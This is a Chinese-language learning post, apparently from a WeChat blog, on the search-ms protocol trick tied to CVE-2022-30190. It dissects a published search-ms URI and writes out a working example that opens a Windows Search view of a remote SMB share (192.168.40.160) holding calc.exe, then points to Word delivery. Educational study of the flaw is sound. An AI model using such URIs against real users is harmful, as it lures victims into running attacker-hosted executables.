CVE-2022-30190漏洞的学习三

    前两篇，我们学习了CVE-2022-30190漏洞的msdt用法。今天，介绍个search-ms的用法。关于这个用法，网上有了介绍，那我为什么还要写这个呢，是重复吗？当然不是，因作者原文中没有详细地描述清楚致使我在学习的过程中走了一些弯路，为了让大家理解知晓这些细节，顺利绕坑，特分享出来。

文：https://www.bleepingcomputer.com/news/security/new-windows-search-zero-day-added-to-microsoft-protocol-nightmare/中，作者对search-ms的用法作了介绍，如下：“

search-ms:query=proc&crumb=location:%5C%5Clive.sysinternals.com&displayname=Searching%20Sysinternals

”。我进行了验证，但始终没能成功。此时才回过头来研究这个语句，察觉我在没有理解它的前提下就盲目地进行验证，撞得“头破血流”，无功而返。

请跟随我，分解语句，看下含义：

1、结构

分为四部分，一是search-ms协议；二是query；三是crumb；四是displayname; 

什么意思呢？

query是查询，是查询含有字符串proc的文件；

crumb是高级查询语法，https://docs.microsoft.com/zh-cn/windows/win32/search/-search-3x-wds-qryidx-crumb；

displayname是显示名；

2、整个语句的意思

就是在\live.sysinternals.com里查找proc这个字符串的文件，在搜索时搜索框显示名为”Searching Sysinternals”。

3、用法

在这里有个关键的地方，就是要有共享文件夹。

我们假设共享192.168.40.160里的999文件夹，其中有calc.exe这个文件；那么整个语句应该就是“

search-ms:query=calc&crumb=location:\192.168.40.160999&displayname=Searching Sysinternals

”

在web或者浏览器里执行下，看效果：

效果出来了。

至于怎么在word里运用，可以结合前两篇中的内容进行变通处理，这里就不多讲了。

原文始发于微信公众号（MicroPest）：CVE-2022-30190漏洞的学习三